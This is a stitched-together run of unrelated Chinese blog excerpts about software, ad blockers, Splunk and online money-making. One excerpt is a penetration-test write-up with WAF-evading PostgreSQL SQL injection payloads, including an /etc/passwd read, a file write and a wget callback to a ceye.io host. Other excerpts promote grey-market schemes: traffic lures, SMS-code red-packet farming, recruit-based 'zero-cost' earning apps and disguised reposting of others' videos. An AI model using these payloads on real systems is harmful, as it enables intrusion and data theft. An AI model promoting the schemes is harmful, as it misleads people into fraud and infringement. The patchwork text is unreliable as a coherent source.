软件介绍 Wireshark是一个网络抓包工具，简称小鲨鱼。 它可以使您可以捕获和以交互方式浏览计算机网络上运行的流量，可以截取各种网络封包，并自动解析数据包，为用户显示数据包的详细信息，供用户对数据包进行分析。 它有一个丰富而强大的功能集，是世界上最受欢迎的网络分析工具之一。它可以在大多数计算平台上运行，包括Windows，macOS， Linux和UNIX。 它常常被用于开发测试过程中定位各种问题，网络专业人员、安全专家、开发人员、运维人员、世界各地的教育工作者经常使用它。 它是免费提供的开源软件，并在GNU 通用公共许可证下发布版本，它由全球协议专家团队开发和维护。 运行截图 ...

互联网巨头再次推出力作：律师函寄给李跳跳的作者。原因是李跳跳通过无障碍模式帮助用户点击“跳过广告”按钮，给企业的广告投放业务造成了损失。通过屏蔽、过滤腾X浏览器的广告服务，吸引用户下载涉案软件，使其不正当地获得竞争优势。 与此同时，许多类似李跳跳的同类APP也收到了律师函。比如，叮小跳也发布公告宣布关闭。在同时收到律师函后，他们不约而同地宣布停止更新。 李跳跳APP是一款能够辅助跳过APP广告的插件，值得注意的是它是辅助性质的。也就是说，当你懒得点击“跳过广告”时，可以使用李跳跳软件来代替点击。这与早年的珊瑚虫QQ相比温和多了，珊瑚虫QQ当时屏蔽了QQ内部的所有广告，为网民提供了一个纯净版的QQ。我们都喜欢使用珊瑚虫，但最终却被腾讯起诉了。相较之下，李跳跳软件的做法更加温和。 实际上，腾讯的做法并没有错，它确实减少了用户的便利。毕竟，李跳跳这款软件损害的只是企业的利益。开屏广告作为存在多年的形式，肯定是有其一定用户群体的，否则也不会有商家继续投放开屏广告。对于大多数人来说，这是利好的。 因此，这就是一个矛盾体：从用户的角度来看，当然不愿意看广告。但从企业的角度来看，如果你不看广告，我怎么能盈利呢?如果我不能盈利，又怎么能为你提供更好的APP体验呢? 那么，应该如何解决这个问题呢?你有什么想法? 目前，我最需要的是两款软件：一款可以屏蔽所有手机APP开屏广告的，另一款是用来检测微信好友是否被删除或者被拉黑了的。不过，这两款功能目前都无法实现。 ...

QQ空间无脑引流老色批，原理非常简单就是QQ空间无脑发美女图片，利用老色批专属的流量池转化变现，无脑简单操作 1.项目介绍   2.项目准备 3.引流转化   ...

【超级会员V1】通过百度网盘分享的文件：接码无限撸红包   ...

上次文章又过去了小半年的时间，忙了小半年也没有什么优秀的东西分享就一直沉寂着，这次我带着实战干货又回来啦！这一次也是干公司的项目，是关于一个登录框的渗透测试，也不逼逼了开始渗透 0x00前言 距离上次文章又过去了小半年的时间，忙了小半年也没有什么优秀的东西分享就一直沉寂着，这次我带着实战干货又回来啦！这一次也是干公司的项目，是关于一个登录框的渗透测试，也不逼逼了开始渗透 首先映入眼帘的是个登录框 老样子找未授权和弱口令，不过这一次这个站有阿里云waf就没有扫目录啦。弱口令admin:123456,很显然开发没这么蠢 这时候应该思考什么，为什么这个站只有登录没有注册，那要怎么注册呢，一定存在一个注册的地方但不在这里。这时候试一下未授权，将目录中的login改成admin试试，果然进来了 在翻一翻，左边企业目录没有数据和修改密码都因为是未授权进来没有什么数据，那目光只能放在帮助上了 帮助处存在两个手册，先来翻一翻这两个手册 先查看第一个手册物业操作手册，可以知道两个信息，初始账户密码都是123456以及有一个手机端但是不知道是APP还是微信公众号还是小程序。 再查看第二个手册企业操作手册，果然这里发现了原来是有个微信公众号里面的小功能呀。 整理一下思路，存在微信公众号以及初始账号密码是123456，这时去爆破看看账号密码咯~ 0x01暴力破解 在翻手册中看到是企业用户那应该用的是人名的拼音作为账号，密码就是123456去试试 果然存在账号密码是123456可惜只能用手机号登录，高危漏洞先记录一个暴力破解存在。 0x02敏感信息泄漏 再看看历史数据包发现了一个有趣的东西，一个白给的数据泄漏 输入pass看看有没有信息，白给了一堆账号密码，不过都利用不了就放着了，再记一个敏感信息高危了 这里web没啥东西了，去微信公众号看看去，根据之前未授权查看的帮助文档顺利找到了这个公众号，一步步点下来终于找到注册的地方咯 0x03用户名枚举 账号注册先放一边，又看到了熟悉的操作手册，点开来看看 点进去看一看，发现了几个电话号码，通过web端的验证看看 通过web端的手机登录，果然存在该用户，喜提手机号枚举中危 0x04PDSQL注入 回归企业用户注册正题来了，接下来干货满满 点击搜索按钮抓包，发现一个搜索的数据包通过对单引号报错以及双单引号闭合，发现了一个sql注入 尝试输入payload，好家伙存在阿某云WAF，sqlmap也跑不了了，只能手注入了 先通过报错查看是什么类型的数据库，通过查询报错语句最终定位是PostgreSQL，这属实有点少见噢 先查看报错的地方来定位sql语句再来构造报错语句，在参数后面添加'11可以看到下面报错sql语句长这样 SELECT * FROM tbl_org WHERE(name '%%' AND type=400) ,传入的数据在两个百分号之间。 一开始我尝试在参数后面添加';payload--+，这样子堆叠注入结果是被拦截了，没办法了只能请大哥-坏学生来帮帮我，不愧是大哥两个小时秒了，给了我一个语句'||(to_date(substring(current_database()from 1 for 1),'qwe'))||'和一张图片 现在来分析一下这个语句，单引号'是用来闭合原本语句中的前单引号'，符号“||”则是用来拼接字符串，意思就是在PDSQL中，一个Select语句可以同时执行多个语句。继续看to_date这个函数的用法 这个函数是用来出错的，substring(current_database)通过将数据库名字拆成一个个字符，然后与后面的qwe进行比较，如果出错就会报出数据库的名字，通过修改from后面的数字可以修改数据库的第几位字符，这样就把数据库名字给注入出来了。tip:这里的语句需要使用URL编码加密过WAF不然会被拦截。查看历史数据包内容发现在加载小区的时候也进行了一次查询，同理在该参数也存在SQL注入，高危漏洞又+1 0x05任意文件读取 继续查看PDSQL的一些高级注入手法发现，可以读取文件和写入文件，通过 '||(to_date(pg_read_file('/etc/passwd',2,20),'qwe'))||',即可读取文件了，该方法同理也是用一个个字符报错得出的，通过修改文件后面的第一位数字就可以读取，任意文件读取高危漏洞+1。 0x06任意文件写入 使用PDSQL的文件写入方法，利用payload:1');COPY (select 1234) to '/tmp/2.jsp';--，并且用URL编码加密在tmp目录下2.jsp文件写入1234 然后使用'||(to_date(pg_read_file('/tmp/2.jsp',4,20),'qwe'))||'查询tmp目录下的2.jsp，已经上传成功了 如果使用'||(to_date(pg_read_file('/tmp/3.jsp',4,20),'qwe'))||'读取tmp目录下3.jsp是不存在的 这里不知道网站的绝对路径就只能证明可以上传了，因为网站是用的spring框架，不知道是在哪里打的jar包。有一个小技巧是通过读取/root/.bash_history查看历史命令就可以看到项目的具体路径不过太麻烦了只能一个个字符读取，索性放弃了。 0x07命令执行 使用payload:1');CREATE TABLE zz(zz_output text);COPY zz FROM PROGRAM 'wget http://XX.XX.ceye.io/1.jpg';--远程执行命令看看ceye平台有无回显，可惜数据库服务器不给力，直接退出进程了。 期间还试过注册了账号，不过需要审批才能使用功能只能登陆，以及尝试利用信息收集到的手机号再结合我登入成功的数据包替换返回包尝试任意用户登陆，不过出了点问题数据加载不出来，估计存在二次校验。 秉持着可持续发展原则，这次渗透就到这里了，鸣谢我同事潇师傅以及坏学生大佬的帮助~咱们下次再见...

前言 对于攻防场景中，我们经常会遇到需要进行日志分析的时候，但是实战场景中，我们拿到的日志量经常是非常大的，很多时候是十几台主机的日志甚至更多。今天带来一个工具splunk，帮助我们快速分析。   正文 拿到安装包后直接安装。   今天我们拿windwos本地日志拿来做例子，正常splunk上传不能解析evtx格式的日志，需要我们配置一下loclal目录下的配置来解析evtx日志。 这里拿自己个人电脑的日志做demo 当我们排查入侵的时候，可以选中进程名进行快速分析，这样可以帮助我们快速的排查一些可疑进程，进而进行样本分析判断。 也可以进行可视化分析 通过可视化分析，快速判断 通过对于关键字段进行过滤排查   如果是多台机器，可以通过限制源IP，将多台机子的安全日志都导入到splunk当中，排查出这台机子对于其他机器的RDP登录情况，以及爆破情况，这是其中一个思路，利用这个平台，可以帮助我们快速的找到异常，从而进一步分析。    ...

该应用需要有 “外网” 才可使用 TikTok是一款玩转音乐创意的短影音应用，更是年轻人的交友社群。在这里每个人都可以拍出属于自己的创意影片，跟着音乐的节奏，你可以尽情拍摄多种影片内容，个人才艺、生活纪录、表演、舞蹈、剧情演绎等。点子有多狂，TikTok 舞台就有多大。赶快上传影片，让世界看见你的独特创意吧！ ...

FreeControl 介绍 基于开源项目scrcpy，提供简洁的交互界面。 编码语言 C# 开发工具 Visual Studio 2022 运行环境 .NET Framework 4.7.2 截图    下载 GitHub Release https://github.com/pdone/FreeControl/releases/latest/download/FreeControl.exe ghproxy代理加速 https://ghproxy.com/https://github.com/pdone/FreeControl/releases/latest/download/FreeControl.exe 代码 https://github.com/pdone/FreeControl  FAQ Q1 输入法问题 个人测试发现，目前支持跨屏进行拼音输入的 手机输入法APP 如下： 搜狗输入法 QQ输入法 谷歌拼音输入法 Gboard 此功能需要输入法APP适配，暂时只发现这4款，有更好用的输入法欢迎留言推荐。  ...

在热点分享里面，设置，打开“蓝牙共享网络”，这样子不需要打开WiFi热点，只要蓝牙两个手机连着就能使用网络。耗电量远远低于WiFi热点。 速率900kbps，大概意思是90kb/s吧？我是通过除以十算的。看视频最低300才不卡，这个速率，看看网页，日常聊天够用了。 ...

0撸日赚几十没有问题【和奖券世界玩法一致】！ 升到38级之后，卖建筑物给玩家，大把的卖光子，大把的吃肉，玩过奖券世界的都懂 前期上线基础版块，后续持续更新其他板块生态，一次推广终身收益。   第一批上车吃肉 点击图片VX扫码下载 趁着人少 先赚一笔   如不知道怎么进交流群的，进入量子宇宙APP后，点击排行榜，加群       ...

“西皮购”平台正以其独特的模式和简单有趣的特点吸引着众多人的眼球。平台让你体验到零撸、零投入的轻松感觉，还以种西瓜换米的形式，为你带来稳定的收益，让你在乐趣中赚钱。 1、独特模式，简单有趣 西皮购平台主打的是一个稳定而有趣的模式。其页面设计精美，简洁明了，让用户在使用过程中获得良好的体验。平台不仅仅是赚钱的工具，更是一个让你享受乐趣的平台。 2、西瓜换米，稳定收益 “种西瓜赚钱”的创意令人耳目一新。在这个平台上，可以通过购买西瓜来获得收益，10个西瓜换取1块钱，100个西瓜换取10块钱。这种简单的模式隐藏着稳定的赚钱模式。 3、轻松赚钱案例 举个例子，你在8天的时间里，收获了6760个西瓜，意味着你赚取了676块钱。今天你又收获了2198个西瓜，这一天的收益为219.8块钱。这种稳定的收益，不仅为你提供了额外的财务支持，还增添了轻松愉快的赚钱体验。 西皮购：用乐趣赚取稳定收益 在快节奏的生活中，人们常常希望能够找到一种既有趣又能赚钱的方式。西皮购平台的出现，恰好满足了这一需求。通过种西瓜换米的模式，你可以在享受乐趣的同时，轻松赚取稳定的收益。零撸、零投入，简单有趣的模式，让你在赚钱的过程中体验到更多的乐趣。 总之，西皮购平台以其独特的模式和简单有趣的特点，为你提供了一种全新的赚钱方式。无论是为了额外的收入，还是为了寻找乐趣，这个平台都将成为你的不二选择。通过种西瓜换米，享受赚钱的乐趣，从此开启一个新的赚钱篇章！ ...

这几天后台有兄弟私信问我：抖音竞争压力太大，想要入局视频号，还有没有机会?正好圈内有做视频号的朋友，跟他私下底交流了下视频号的情况。 他告诉我两点非常有用的信息 1：视频号主要人群为两大类，一是中老年群体，二是三十岁左右的大姐姐。 2：现阶段官方对公域流量扶持非常大，不管是短视频还是直播。 他现在就是专注于做中老年产品，具体是什么产品就不透露了，毕竟还是要遵守一定的商业道德，他同时做了几十个号，做的好的时候一天10几万流水，毛利还是非常高的。 关键项目没什么难度，只要跑通了流程，接下来就是铺号怼量就完事了。所以现在入局视频号并不晚，也是非常好的时机，基于以上他告诉我的两点有效信息，我们就有了大致的思路。 在视频号上做流量，做项目，一定要清楚这上面的人群属性，这样方便我们后续做好变现，不管是卖服务也好，卖产品也罢，起码我们的大致框架和方向不会跑偏。反之如果连这些都不清楚，无异于闭门造车，任何项目都是一样，目标人群一定要清楚。 01 视频号到底好不好做 视频号到底好不好做，能否赚到钱，我们接下来看几个实例，以教育产品为例，这个是我刷到的一个视频。 这就是一个普通的增高器视频，但这个视频爆火之后，把这个增高产品也带火了，可以看一下，销量已经达到3w+了。 售价区间19.9—39.9，以最低价格为例，我们看看其他平台渠道给的价格，某多上，售价13块多(不领券)，利润空间达50%，而且量大，拿货价格还可以谈。 销量3万多单，利润接近18万，这个数据还是很恐怖的，这还只是单个产品。 02 这种视频怎么做呢? 其实非常简单，这视频并非他们原创，翻看他们主页就知道，每个视频的人物都不一样，这就意味着视频是他们从其他平台搬运过来，进行二次加工，伪原创的。 可以从其他视频平台，如Tik Tok，KS等平台获取资源，然后经过二次加工，比如：去掉开头，结尾，视频翻转镜头，修改大小，md5值等操作来进行再次编辑就可以了，只不过画面会有些模糊。 视频号带货这类项目，更多的是大批量的去规模化操作，实现利润的最大化，所以，我并不建议大家去做原创，但并非不鼓励大家做原创，只不过这类视频，做原创太费时间，而且效果还不一定好，不利于批量化运营。如果大家要操作，建议先准备好10个以上的视频号，每天每个号发5-10个视频，只要有一个视频爆了，就可以为你带来不少的收益。多号操作也是为了增加视频爆火的机率，千万别指望，一个号发几天视频就能爆火，这样不切实际。 而且还可以加入直播的玩法，视频爆火后，对应的带货商品也会有很大的曝光，这个时候开直播，就卖被曝光的商品，可以大大提高转化率。另外视频号也有流量投放的渠道，也可以花钱买流量，玩法基本跟抖音类似，如果之前有在抖音上玩这类项目的兄弟，现在可以直接复制搬运这种模式到视频号就可以了。 至于带货选品方面，可以参考同行，把所有同行的爆火商品都收藏下来，进行分析，归类，然后选择利润空间大一点的。 其次也可以根据上面我提到的目标人群属性来选品，主要两大类，一是中老年群体，二是三十岁左右的大姐姐，当然这其中也包括宝妈，提到宝妈，自然也就能想到儿童类产品，举一反三，可以带货的产品有很多。 视频号以微信为根基，而微信每天的日活接近10亿，就算视频号是个闭环区间，仅靠微信上的流量，就已经相当庞大了，况且视频号还连通了公众号，我相信视频号未来还会有无限的可能。...